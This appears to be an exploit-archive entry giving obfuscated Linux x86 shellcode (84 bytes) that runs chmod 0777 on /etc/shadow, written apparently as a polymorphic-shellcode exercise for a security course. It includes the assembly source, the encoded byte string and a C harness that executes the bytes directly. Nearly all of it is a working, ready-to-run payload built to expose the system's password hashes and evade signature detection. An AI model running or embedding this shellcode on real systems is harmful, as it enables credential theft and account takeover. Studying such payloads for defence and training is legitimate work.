Shellcode - Linux/x86 - chmod 0777 /etc/shadow obfuscated (84 bytes)

2015-03-16 12:05:09

/*
* Linux x86 - execve chmod 0777 /etc/shadow
* Obfuscated version - 84 bytes
* Original: http://shell-storm.org/shellcode/files/shellcode-828.php
* Author: xmgv
* Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/
*/

/*
global _start

section .text

_start:
sub edx, edx
push edx
mov eax, 0xb33fb33f
sub eax, 0x3bd04ede
push eax
jmp short two

end:
int 0x80

four:
push edx
push esi
push ebp
push ebx
mov ecx, esp
push byte 0xc
pop eax
dec eax
jmp short end

three:
push edx
sub eax, 0x2c3d2dff
push eax
mov ebp, esp
push edx
add eax, 0x2d383638
push eax
sub eax, 0x013ffeff
push eax
sub eax, 0x3217d6d2
add eax, 0x31179798
push eax
mov ebx, esp
jmp short four

two:
sub eax, 0x0efc3532
push eax
sub eax, 0x04feca01
inc eax
push eax
mov esi, esp
jmp short three
*/

#include <stdio.h>
#include <string.h>

unsigned char code[] =
"\x29\xd2\x52\xb8\x3f\xb3\x3f\xb3\x2d\xde\x4e\xd0\x3b\x50\xeb\x33\xcd\x80"
"\x52\x56\x55\x53\x89\xe1\x6a\x0c\x58\x48\xeb\xf2\x52\x2d\xff\x2d\x3d\x2c"
"\x50\x89\xe5\x52\x05\x38\x36\x38\x2d\x50\x2d\xff\xfe\x3f\x01\x50\x2d\xd2"
"\xd6\x17\x32\x05\x98\x97\x17\x31\x50\x89\xe3\xeb\xcf\x2d\x32\x35\xfc\x0e"
"\x50\x2d\x01\xca\xfe\x04\x40\x50\x89\xe6\xeb\xca";


int main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

Fixes

No fixes

In order to submit a new fix you need to be registered.